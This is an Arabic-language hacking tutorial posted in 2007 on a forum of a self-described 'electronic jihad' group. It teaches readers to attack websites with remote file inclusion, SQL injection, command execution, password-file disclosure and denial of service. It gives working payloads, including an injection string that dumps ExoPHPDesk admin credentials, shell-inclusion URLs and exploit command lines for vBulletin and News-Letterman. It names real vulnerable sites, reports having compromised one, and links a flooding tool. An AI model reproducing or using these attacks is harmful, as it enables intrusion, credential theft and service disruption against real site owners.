Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: دوره الثغرات وماتعني


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
دوره الثغرات وماتعني
Permalink   
 


بسم الله الرحمن الرحيم

الحمد لله رب العالمين والصلاه والسلام على رسول الله سيدنا محمد وعلى اله

وصحبه اجمعين اما بعد:::::


دورتنا اليوم عن الثغرات وهي اكيد الاكسبلويتات__




طيب ماذا يعني الاكسبلويت؟؟

هو ملف مكتوب بلغه برمجه او تقرير عن خطا ممكن يستغله الهاكر في صالحهم

انواع الاكسبلويتات

1-][®][ Remote File Include Vulnerability ^][®][

ثغرات الفايل انكلود وهي اللى يكون سببها خطا في سكربت معين ومن خلال هاذا

السكربت بامكانك ربط شل ومن ثما اختراق الموقع والسيرفر بالكامل

2-][®][sql injection][®][

ثغرات حقن الوريد وهي اللى تكون سببها ضعف في برمجه قاعده البيانات

ومن خلالها بامكاني الحصول على اسم الادمن والباس مشفر

3-][®][command excuation expolit][®][

ثغرات تطبيق اوامر اللينكس وهي اللى من خلالها بامكاني تطبيق اوامر اللينكس

ومن ثما سحب الشل واختراق الموقع والسيرفر وهي قريبه من النوع الاول

4-][®][denial of services ][®][

ثغرات حجب الخدمه وهي اللى تعتمد على برامج مثل برنامج الدوره ويقوم بارسال

بنكات تعطل عمل الموقع وقد يكون السير بالكامل ويشترط الكثره والهجوم في وقت

واحد كما حصل مع الصحيفه الدنماركيه.....

5- ][®][Remote Password Disclosure Vulnerability ][®][

وهذا النوع من الثغرات يعتمد على استغلال قصير ويستهدف مجلدات الباسوردات

واللى يسحبها من الموقع


طيب الان فهمنا معنى الثغره ممتاز واونواعها ممتازين

طيب بقى كيفيه الاستغلال بالكلام ثما بالصور

طريقه استغلال الاكسبلويت تختلف من اكسبلويت الى اكسبلويت لماذا؟؟

لانا كل اكسبلويت مكتوب بلغه معينه وعلى سيبل المثال

1-اكسبلويتات المتصفح

2-اكسبلويت لغه البيرل واللى تحتاج مترجم وهو برنامج active perl

3_اكسبلويتات مكتوبه بلغه البي اتش بي وايضا تحتاج وسيط

4- اكسبلويتات اللى مكتوبه ايضا بلغه السي والبايثون واللى يتم استغلالها من

خلال مترجمات خاصه لما تشرح الابعدين

طيب ممتاز نذهب الى الشرح بالصور لكل نوع من الاكسبلويتات

][®][][®][][®][][®][][®][][®][][®][

1-طيب الثغره الاولى وهي ثغره الفايل انكلود

طيب اخاوني كيف اعرف استغل مثل هاذي الثغره وغالبيه *90 % من هاذا النوع

يكون استغلاله عن طريق المتصفح:::::::



طيب ممتاز عرفت كيف افهم هذا النوع من الثغرات ودائما تجد الاستغلال تحت

كلمه expolit

وللتجربه سنبحث عن هذا السكربت المصاب

كود:
"DreamStats"
كود:
http://www.Site.com/PaTh/index.php?rootpath=[Shell]
/PaTh/= والمقصود بها اسم السكربت وقد يكون الادمن مغيره لاجل احتياطات

امنيه للموقع

طيب انا بحثت ولقيت موقع مصاب وهو
http://www.thegamehoster.org/content/COD2stats/

طيب اجرب الاستغلال الحمدلله تم رفع الشل

http://www.thegamehoster.org/content.../linuxhak.txt?
ولابد اخاوني ان تنوع في عمليه البحث ولاتعتمد على محرك بحث واحد...

][®][][®][][®][][®][][®][][®][][®][

2- شرح مصور لثغرات حقن الوريد

ثغرات sql

اخي العزيز هاذي الثغرات تكون سبب في ضعف برمجه قواعد البيانات

وهاذي الثغرات تودى الى عدد من الاهداف:

1- الحصول على باس مشفر

2-الدخول بدون اسم ادمن

3- اضافه حساب يتميز بمميزات الادمن

4-الدخول باسم الادمن

طيب بتقول ياصقر طفشنا كلام كلام كلام بدون صور

ابشرررررررررررررررررررررررررررووووو وانا بن تومان الكبيري

طيب كيف اعرف هاذي الثغرات طيب نروح موقع مليوورم اوسكورتي فوكس




الان عرفنا كيف نعرف ثغرات sql

طيب وش رايكم في عرض بعض الثغرات طيب هاذي الثغره نعرضها

ابحث عن هذا السكربت

كود:
Powered by ExoPHPDesk v1.2 Final.

بعد مجلد السكربت اضيف هاذا الاستغلال
كود:
//faq.php?action=&type=view&s=&id=-1'%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/*
طيب ممتاز لقين موقع مصاب وهاذي صورته




للتجربه أدخل وضع الاستغلال بعد الشخطه ( / )

http://www.datto.com.br/suporte/

وانا اصلا وضعت الباس في موقع المليورم شيكو عليه يمكن فك تشفيره

طيب عرفنا ميزه للثغرات حقن الوريد وهي تتطلع لك الباس مشفر طيب

هناك اهداف اخرى لهاذي الثغرات تخبرون ياشباب ثغرات سجل الزوار

ومجلات النيوك تعتبر من تصنيف ثغرات حقن الوريد لكن قبل مامشي اريد

ان تعرف بعض اهم مصطلحات هاذي الثغره

selcet= معناها اختبار مجلد معين في قاعده البيانات

update= معناها تغيير حاجه ما في قاعده البينات

adminhash= معناها هاش الادمن واللى دائما يكون ام دي فايف

insert= وتعني ادخال حاجه جديده الى قاعده البيانات وهذا امر تلقاه دائما في

ثغرات حقن الوريد اللى هدفها نغيير باس الادمن ومثاله

insert 123 *admingroup

مثلا هاذا

null= هذا يدل على فك هاش معين في قاعده البينات

وغيرها الكثير الكثير ولكن هاذي اهمها ستجد هاذي الكلمات في كل استغلال

لهاذي الثغرات..

][®][][®][][®][][®][][®][][®][][®][


3- ثغرات الكوماند اكسيوشن وهي تسمح للهاكر بان يطبق اوامر اللينكس انا صراحه

ابغيت اشرح على ثغره منتديات قديمه بس انا شرح مثال عليه تحت في طريقه

استغلال ثغره الكوماند اكسيوشن ...............

][®][][®][][®][][®][][®][][®][][®][

4- كذلك اردت شرح لكم بعض البرامج اللى من خلالها نستطيع ان نطيح سيرفرات

كبييره وهي ليست مندرجه تحت لا الاكسبلويتات ولا ايضا الثغرات ولكن قلت خلينا

نشرحها::::::::::::::::: عن طريق برنامج web attack




حمل البرنامج من هنا
http://up.9q9q.net/up/index.php?f=Xwv7b2FhE


ومثل ماقلنا سابقا هاذي البرامج لاتقوم باختراق الصفحه وانما باغلاقها موقتا

وتحتاج ايضا الى عدد كبير من المشاركين في الهجوم ..........

][®][][®][][®][][®][][®][][®][][®][

5- الثغره الخامسه وهي الاتيان بمجلدات باس الادمن وهي تذكرنا بثغره الفرونت بيج

القديمه وسوف اشرح كيف تفهم مثل هذا النوع من الثغرات:::::



طيب دعونا نجرب مثل هاذي الثغرات اولا ابحث عن السكربت المصاب

كود:
WWWBoard 2.0 Alpha
واضيف بعد مجلد السكربت هذا الاستغلال
كود:
]/passwd.txt
طيب لقيت موقع مصاب ممتاز ولقيت باس الادمن مشفر على مقياس des

برنامج الجون المشروح في قسم اختراق المواقع والسيرفرات........

وهذا الموقع للتجربه

http://www.ncat.edu/~schofed/swat/wwwboard/passwd.txt

][®][][®][][®][][®][][®][][®][][®][

كيف اقوم بترجمه الاكسبلويتات المكتوبه بلغه البيرل والبي اتش بي

الى الشرح بالصوررررررر::::::

طيب كيف اعرف اني هاذي الثغره مكتوبه بلغه البي اتش بي اذا لقيت في بدايه

الاكسبلويت

كود:
<?php
طيب وعرفنا كيف نفهم ثغره البي اتش بي طيب كيف اقوم بترجمتها انا عندي برنلمج

تحت اسمه بي اتش بي الاصدار الخامس :::::::: سـاقوم انا الان بالتطبيق على

ثغره الاكسبلويت حقها مكتوب بلغه البي اتش بي بعد ماتنصب البرنامج في السي


وهي ثغره حديثه في منتديات
vBulletin <= 3.6.4
والاكسبلويت حقه نحفظه بامتداد بي اتش بي
http://www.milw0rm.com/exploits/3387
يعني يسير كذا مثلا

so9or.php

وتكون محفوظه في مجلد البرنامج في السي


طيب وبعدين اروح للدوس








طيب لان الصوره ماكفت للشرح
اشرح الاستغلال
php so9or.php localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80

rgod اسمك في المنتدى مثلا

mypass 2 121

p الاي بي حقك

80 البورت

بعدها اضغط انتر تلقى المنتدى تحت يدك ولكن بشرط لازم تكون انت وياه سوبر

مودريتر اي مشرف عام تكفون لاتطبقون على مواقع عربيه

][®][][®][][®][][®][][®][][®][][®][

حمل برنامج مترجم لغه البي اتش بي من هنا
http://nl2.php.net/distributions/php...-installer.msi

اما بالنسبه للبيرل كيف اترجمها الى الشرح بالصور

اولا البرنامج اللى يقوم بترجمه مثل هاذا النوع من الثغرات اسمه

اكتف بيرل :::::: بس قبل هذا كيف اعرف ان هذا الاكسبلويت بلغه البيرل

كود:
#!/usr/bin/perl
اذا لقيت هاذي في بدايه الاكسبلويت فاعرف انه الثغره اللى تتعامل معها بلغه البيرل

ومثل ماقلنا التعامل معها لابد ان يكون بوسيط وهو برنامج اكتف بيرل نزل البرنامج

من الرابط اللى تحت نكست في نكست وفكه في السي مايحتاج صواريخ :::

طيب انا عندي الان ثغره تسمح لك بانك تطبق اوامر اللينكس ومن خلالها ترفع شل يعني هي كوماند اكسيوشن اكسبلويت الثغره الثالثه بس اكسبلويتها مكتوب بلغه البيرل وهي موجودها

في هذا السكربت
News-Letterman 1.1
والاستغلال موجود في هاذي الصفحه
http://www.milw0rm.com/exploits/3406
اقوم وساسوي لصفحه حفظ واخليها محفوظه بامتداد pl يعني كذا
so9or.pl
ومثل ماقلنا فكينا البرنامج في السي داخل مجلدات البرنامج ستجد مجلد اسمه

bin احفظ الصفحه فيه بالامتداد اللى قلته سابقا::: ولااعتقد انه يحتاج شرح بالصور .................................
يعني تحفظه في المسار هذا...

كود:
C:\Perl\bin
طيب حفظنا الاكسيبلويت كلها ساعلمك كيف استغل الثغره الان:::

نذهب الى الدوس::::: ونسوي كما بالصوره:::::







بعد مانضغط انتر يطلع لك معلومات الاكسبلويت









كود:
exploit.pl [target] [cmd shell location] [cmd shell variable]


exploit.pl= المراد بهذا اسم الاكسبلويت اللى حفظته انت بامتداد pl

target= المراد به الموقع المستهدف

cmd shell location= رابط الموقع اللى رافع عليه شل

cmd shell variable= اوامر اللينكس المطبقه

طيب يعني يكون الاستغلال كذا

exploit.pl
www.sex.com/www.hack15.com.ch.txt? is-al

اعذروني ياشباب لما اجيب فار تجربه لاني والله استنى متى اخلص نوم نوم نوم::::

اذا وش استفدت انظر الى usage اي الاستخدام حتى اعرف كيف استخدم

الاستغلال صح


حمل active perl
http://downloads.activestate.com/Act...x86-211909.msi


وفي امان الله اخاوني

اخوكم
صقر غامد







-- Edited by so9or at 17:56, 2007-03-10

__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard